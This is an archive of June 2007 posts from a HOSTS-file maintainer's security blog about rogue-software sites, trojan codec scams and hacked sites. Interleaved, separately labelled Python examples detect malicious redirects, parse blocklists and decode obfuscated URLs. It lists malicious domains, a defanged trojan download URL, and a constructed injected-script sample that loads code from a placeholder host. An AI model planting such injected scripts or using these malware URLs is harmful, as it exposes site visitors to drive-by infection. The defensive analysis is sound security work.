June 2007 - Posts

Disney has some explaining to do

Following up on a tip from the Castlecops MIRT Team (Malware Incident Reporting and Termination) about a new entry for mcboo(dot)com. As you can see below, this new entry is definitely a nasty.

Now what I find disturbing is that I decided to "Google" and see if there were any other new entries that I should add to the HOSTS file. Well, I found the following:

hxxp://j10.wrs.mcboo.com/retadpu.exe?affID=27


Which redirects to go.com (operated by Disney) ... so I checked the DNS of that entry and found it is actually "disney.com" ... huh? What in the world is Disney doing associating with the MatCash family of Trojans?

"Win32/Matcash is a family of multi-component trojans that can be used to download and execute arbitrary files."

McAfee detects another mcboo entry as Downloader-BCF. The question I have is: who is "affID=27"?
Is Disney affiliate #27 of the MatCash Trojan family? ... Oh Disney, what were you thinking?
199.181.132.250 = Disney Worldwide Services

While still researching the malicious "mcboo(dot)com" entries I found this ... look familiar? Yeah, we've seen this malicious trick many, many times before (Missing Video Codec) ...

And just who is involved in this latest Trojan.Codec scam? ... you guessed it, "mcboo(dot)com" ...

So just what relationship does Disney (go.com) have with these *** peddlers, because "waverevenue(dot)com" is a hard-core porn site ... Oh Disney, what were you thinking?

Posted by winhelp2002 with 2 comment(s)

When is an Image file not an Image file

When is an Image file not an Image file ... when it is used to redirect the visitor to another, often malicious, site. You would think by now (Windows Vista) that Microsoft would have corrected this flaw, but I guess not ...

Look closely in the Result column at the "favicon.ico" entry above and notice the "302" ... well, 302 is used to redirect the browser to another location, in this case "adult-models(dot)org", which NOD32 detects as: JS/Exploit.MS05-013. There are about 15 other related sites that I found using this same "302" redirect method.

Although "MS05-013" is an older patched vulnerability, it is still rather nasty ...

If a user is logged on with administrative user rights, an attacker who successfully exploited this vulnerability could take complete control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.

This is a good example why it's so important to keep your Windows updates current, or upgrade to Windows Vista.
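The trick described in this post is easy to spot once you look for it: a request for an image resource (favicon.ico, a .gif, a .png) is answered with a 3xx redirect whose Location points at another host, or with a 200 whose body is not an image at all. The check below is an added example, not code from the original post; it runs over a constructed, offline set of request/response records (placeholder hostnames, not the sites named above) in the shape a proxy or web-debugger log would give you. Same-host redirects for an icon are routine and are deliberately not flagged.

```python
from urllib.parse import urljoin, urlsplit

# Constructed sample of request/response records, as a proxy or web-debugger
# log would show them. Hostnames are placeholders, not the sites in the post.
SAMPLE_RECORDS = [
    {"url": "http://news.example.net/favicon.ico", "status": 302,
     "headers": {"Location": "http://redirect-target.example/index.php"}},
    {"url": "http://news.example.net/images/logo.png", "status": 200,
     "headers": {"Content-Type": "image/png"}},
    {"url": "http://news.example.net/favicon.ico", "status": 301,
     "headers": {"Location": "/static/favicon.ico"}},       # same host: routine
    {"url": "http://cdn.example.net/pixel.gif", "status": 200,
     "headers": {"Content-Type": "text/html"}},              # HTML served as an "image"
]

IMAGE_EXTENSIONS = (".ico", ".gif", ".jpg", ".jpeg", ".png", ".bmp")
REDIRECT_CODES = {301, 302, 303, 307, 308}


def is_image_request(url):
    """True if the request path looks like an image resource."""
    return urlsplit(url).path.lower().endswith(IMAGE_EXTENSIONS)


def suspicious_image_responses(records):
    """Flag image requests answered with a cross-host redirect or a non-image
    body. Returns a list of finding dicts in log order."""
    findings = []
    for rec in records:
        url, status = rec["url"], rec["status"]
        if not is_image_request(url):
            continue
        headers = {k.lower(): v for k, v in rec.get("headers", {}).items()}
        if status in REDIRECT_CODES:
            # Resolve a relative Location against the request URL before
            # comparing hosts, so "/static/favicon.ico" is not a false positive.
            target = urljoin(url, headers.get("location", ""))
            if urlsplit(target).hostname != urlsplit(url).hostname:
                findings.append({"url": url, "status": status,
                                 "reason": "cross-host redirect", "target": target})
        elif status == 200 and not headers.get("content-type", "").startswith("image/"):
            findings.append({"url": url, "status": status,
                             "reason": "non-image content-type",
                             "target": headers.get("content-type", "")})
    return findings


if __name__ == "__main__":
    for f in suspicious_image_responses(SAMPLE_RECORDS):
        print(f"{f['status']} {f['url']} -> {f['reason']}: {f['target']}")
```

To use this against real traffic, feed it the records from your proxy or HTTP debugger; the same logic applies to any resource type the browser fetches without user interaction (scripts, stylesheets), not only images.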

Posted by winhelp2002 with no comments

SANS Warning - Active Banner Ads

Looks like my HOSTS file got a mention yesterday from SANS Internet Storm Center - warning about the evils of Active Banner Ads. Although I would disagree with the following:

The innocent-looking ad contains javascript that re-directs the browser to a compromised bot, which in turn re-directs the browser to the final malware page.  Thus, a website blocking any ads linking to systemdoctor.com or winfixer won't help.

Well, at some point the malicious site must link back to systemdoctor/winfixer in order to attempt to install their software, and this is where the HOSTS file will block that attempt ...
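The argument above is that it does not matter how many hops the ad chain goes through, because the final hop has to name the rogue-software host, and that name is in the HOSTS file. The following is an added example, not the MVPS file or code from the post: a small parser for the HOSTS file format (one address followed by one or more hostnames per line, `#` comments) and a check that walks a constructed redirect chain and reports the first hostname the file stops. The file excerpt and hostnames are made up for the example; real entries map to 127.0.0.1 or 0.0.0.0, and both are treated as blocking here.

```python
import ipaddress

# Constructed HOSTS-file excerpt in the MVPS layout (not the real file).
SAMPLE_HOSTS = """\
# blocklist excerpt, constructed for this example
127.0.0.1 localhost
127.0.0.1 www.winfixer.example
0.0.0.0   systemdoctor.example   # trailing comments are allowed
0.0.0.0   ads.example tracker.example
"""

BLOCK_ADDRESSES = {"127.0.0.1", "0.0.0.0"}
LOOPBACK_NAMES = {"localhost", "localhost.localdomain", "broadcasthost"}


def parse_hosts(text):
    """Return {hostname: address} for every mapping in HOSTS-file text.
    Lines with a non-IP first field are ignored rather than raising."""
    mapping = {}
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        addr, *names = line.split()
        try:
            ipaddress.ip_address(addr)
        except ValueError:
            continue
        for name in names:
            mapping[name.lower().rstrip(".")] = addr
    return mapping


def is_blocked(mapping, hostname):
    """True if the HOSTS file sends this exact hostname to a blocking address.
    Matching is exact: a new subdomain of a listed host is NOT covered."""
    name = hostname.lower().rstrip(".")
    if name in LOOPBACK_NAMES:
        return False
    return mapping.get(name) in BLOCK_ADDRESSES


def first_blocked_hop(mapping, chain):
    """Walk an ordered redirect chain of hostnames and return the first one
    the HOSTS file stops, or None if the whole chain gets through."""
    for host in chain:
        if is_blocked(mapping, host):
            return host
    return None


if __name__ == "__main__":
    hosts = parse_hosts(SAMPLE_HOSTS)
    # Constructed chain: banner ad -> compromised relay -> rogue software site
    chain = ["ad.network.example", "bot.compromised.example", "www.winfixer.example"]
    print(first_blocked_hop(hosts, chain))   # the last hop is where it stops
```

The exact-match behaviour is the practical caveat: the file blocks `www.winfixer.example` but not `download.winfixer.example` until someone adds it, which is why these lists need the constant updating this blog documents, and why a redirect that goes straight to an IP address is not stopped at all.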

Posted by winhelp2002 with no comments

Beware of encoded URLs

I found a forum spam post, known as spamdexing, today that used an encoded URL (these are never good) ...

This one decodes to "xx-amateur-movies(dot)org", which then redirects to several other sites, and as you can see below, the visitor ends up on a Trojan.Codec site.

There are about 20 other sites related to this latest scam, which are detected as Trojan.Win32.DNSChanger.jb

Posted by winhelp2002 with no comments

A bogus Message Box Object Error

Landing on "sexempire(dot)biz" ... a "Malicious.Links" site ... the visitor is first presented with "scanner(dot)malwarealarm(dot)com", a Rogue Security Program. What's worse is that any link clicked displays the following bogus message.

Now, no matter which button you click, you are prompted to download a bogus ActiveX Object. freerealitympegs(dot)com then redirects to nmextensions(dot)com (already included in the HOSTS file), which is detected as: Trojan.Dropper.Multi.IV

Posted by winhelp2002 with 1 comment(s)

Adware Class Action Lawsuit against ValueClick

This should be interesting if it goes forward ... full story here (pdf)

The suit alleges that defendants ValueClick, Inc., Commission Junction, Inc. and Be Free (collectively, “ValueClick”) have engaged in unfair business practices resulting in harm to affiliates and merchants on their affiliate networks. According to the complaints, ValueClick has failed to take reasonable steps to address malicious adware and adware users on its networks.

The lawsuits also allege that ValueClick has a motive to allow unlawful adware activity on its networks because adware results in increased revenues to ValueClick.

"ValueClick has a motive to allow unlawful adware activity on its networks because adware results in increased revenues"

Wow, that last sentence sure sounds familiar, doesn't it ... as readers of this blog know, I complained about that very same practice with ValueClick's involvement with the WinFixer Group. I hope the law firm bringing this suit has some good legal-eagles, as ValueClick has some very deep pockets.

Posted by winhelp2002 with no comments

Local NYC News Organization Hacked

While browsing a news story via Google, landing on a news site (brooklyndowntownstar(dot)com), I discovered that their server has been hacked and several Javascripts have been injected.

The javascripts decode to several Chinese-registered sites, although several are no longer functioning. While I'm not sure of their purpose, it looks like they are advertising-related rather than malicious ...

The reason I mention that their server has been hacked, rather than just that site, is that this News Organization operates several other newspaper sites in the NYC area, and in checking, they are all infected ...

All the links to other sites above in the left column generate the same injected javascripts ... I have contacted them via their contact page but no response as of yet ... looks like the IT staff there is asleep at the wheel. Hopefully this will get corrected soon, as these hackers could have injected malicious content just as easily ...

Update: after contacting the required parties via their Whois info email address ... the problem has been corrected.
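Both the encoded URL in the spam post above ("Beware of encoded URLs") and the injected scripts on the newspaper sites in this post come down to the same chore: peel off the encoding layers and pull out the hostnames, so they can be checked and added to the HOSTS file. The decoder below is an added example and not the author's tool; it handles percent-encoding (including double encoding, where `%2568` has to be decoded twice to reach `h`), the JavaScript `%uXXXX` form, `\xNN`/`\uNNNN` string escapes and HTML entities, repeating until nothing changes, then lists every hostname it finds, defanged in the "(dot)" style this blog uses. The spam post and injected script it runs on are constructed samples with placeholder hostnames, not the content the author found.

```python
import html
import re
from urllib.parse import unquote, urlsplit

# Constructed samples (placeholder hostnames, not the real ones from the posts).
SAMPLE_SPAM_POST = (
    'Great movies here: <a href="http://%78%78-example%2Eorg/go.php?'
    'r=%2568%2574%2574%2570%253A%252F%252Fcodec-bait%2Eexample%2Fplay">click</a>'
)
SAMPLE_INJECTED_JS = (
    'document.write(unescape("%3Cscript src=%22http%3A%2F%2Fstat.example.cn'
    '%2Fa.js%22%3E%3C%2Fscript%3E"));'
    'var s="\\x68\\x74\\x74\\x70://count.example.cn/c.js";'
)

_PERCENT_U = re.compile(r"%u([0-9a-fA-F]{4})")                 # JS escape() form
_JS_ESCAPE = re.compile(r"\\(x[0-9a-fA-F]{2}|u[0-9a-fA-F]{4})")  # \xNN and \uNNNN
# Lookahead so a URL nested inside another URL's query string is found too.
_URL = re.compile(r"(?=((?:https?|hxxps?)://[^\s'\"<>()]+))", re.IGNORECASE)


def decode_layer(s):
    """Strip one layer of the common encodings, in an order that does not
    let one decoder eat another's input (entities first, percent last)."""
    s = html.unescape(s)
    s = _PERCENT_U.sub(lambda m: chr(int(m.group(1), 16)), s)
    s = _JS_ESCAPE.sub(lambda m: chr(int(m.group(1)[1:], 16)), s)
    return unquote(s)


def decode_all(s, max_layers=8):
    """Repeat decode_layer until a fixed point; max_layers bounds the loop
    so a pathological input cannot spin forever."""
    for _ in range(max_layers):
        out = decode_layer(s)
        if out == s:
            break
        s = out
    return s


def extract_hosts(text):
    """Hostnames of every URL in the text, in first-seen order, no duplicates.
    'hxxp' defanged schemes are accepted as well."""
    hosts = []
    for m in _URL.finditer(text):
        url = re.sub(r"^hxxp", "http", m.group(1), flags=re.IGNORECASE)
        host = urlsplit(url).hostname
        if host and host not in hosts:
            hosts.append(host)
    return hosts


def defang(host):
    """Write a hostname the way this blog does, so it is not clickable."""
    return host.replace(".", "(dot)")


if __name__ == "__main__":
    for label, sample in (("spam post", SAMPLE_SPAM_POST), ("injected js", SAMPLE_INJECTED_JS)):
        print(label + ":", ", ".join(defang(h) for h in extract_hosts(decode_all(sample))))
```

The fixed-point loop is the important part: spam and injected scripts are routinely encoded two or three layers deep precisely so that a single `unescape` in a filter shows nothing interesting.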

Posted by winhelp2002 with 1 comment(s)

MVPS HOSTS File Update 06-14-07
The MVPS HOSTS file was recently updated [06-14-07]
http://www.mvps.org/winhelp2002/hosts.htm

Download: hosts.zip (140 kb)
http://www.mvps.org/winhelp2002/hosts.zip

How To: Download and Extract the HOSTS file
http://www.mvps.org/winhelp2002/hosts2.htm

HOSTS File - Frequently Asked Questions
http://www.mvps.org/winhelp2002/hostsfaq.htm

Note: the "text" version makes a great resource
for determining possible culprits ... (591 kb)
http://www.mvps.org/winhelp2002/hosts.txt

Sign up for HOSTS file update notices
http://www.mvps.org/winhelp2002/hosts.htm#contribute

Posted by winhelp2002 with 2 comment(s)

Zango/Hotbar after 1 Year

It was one year ago this week that Zango and Hotbar merged ... so how are they doing?

Zango (in blue) and Hotbar (in red) both seem to have dropped in traffic flow quite a bit over the last year. Doesn't look like things are going well ... I guess someone at Zango must have determined that their drop in traffic was due to PcTools, so they sued them. However, this is not going well either ... Zango subsequently lost a similar suit seeking a restraining order against Kaspersky.

Posted by winhelp2002 with no comments

Bogus Media Software

Landing on "about-sexy(dot)com" or, sadly, about 40 other similar sites, the viewer is presented with yet another bogus message

This redirects to "funcodec(dot)com" detected as: Trojan.Win32.DNSChanger.jb. Needless to say I spent quite a bit of time locating these culprits and adding them to the next HOSTS file update ...

Posted by winhelp2002 with no comments

Visiting the StopBadware Database
In light of several reports lately about the number of Malware sites that now exist, I thought I'd go through the database at StopBadware.org and see what I could find ... 92,000 sites ... wow!

Over the last several days I visited 10,000 ... that's right, 10,000, which should give a good cross-section of their database. What I found was that the majority of these sites, forums, etc. have been hacked and the culprits have injected a variety of Malware ... some of them are pretty nasty, and many of them (hacked sites) contain multiple exploits.

Armed with only my HOSTS file and my NOD32 Antivirus (no antispyware) on Windows Vista, I added the culprits (several hundred) to the HOSTS file as I found them. So how did I make out? Not one, let me repeat, not one exploit was able to get through my defenses; that's pretty impressive and says a lot about the added security of Windows Vista.

Now I have to give a lot of credit to my antivirus, NOD32 from eset.com, which detected a lot of Malware before the site even finished loading, and which, by the way, was just awarded the highest rating from av-comparatives.org. You can view the full report here (.pdf)

I've listed below the latest detections by NOD32 while I was going through the list of reported Malware sites ... naturally these will be added to the next update of the HOSTS file.

Note: while I was tied up with this project over the last few days I may have missed sending a few of you the Update Notices for the latest HOSTS file version ... sorry about that ...

Posted by winhelp2002 with no comments

WinFixer - here we go again

Landing on "damiboy(dot)com", a Google.Warning site, the viewer gets whacked automatically with several exploits and, for good measure ... several Rogue products ... better have your layered protection in order!

As soon as I landed on the site my AV NOD32 jumped up with the below ... as you can see, the site also tries to load an exploit via Java, which I do not have installed ... just for that reason; Sun cannot seem to keep up with the exploits of their software.

Let's look at the cast of characters involved, and there are many ...

The 502 sites you see in red are already in my HOSTS file, the others will be added to the next update. Nice place for the WinFixer Group to hawk their bogus software. I really feel sorry for anyone that lands on this site that doesn't have adequate protection.

Posted by winhelp2002 with no comments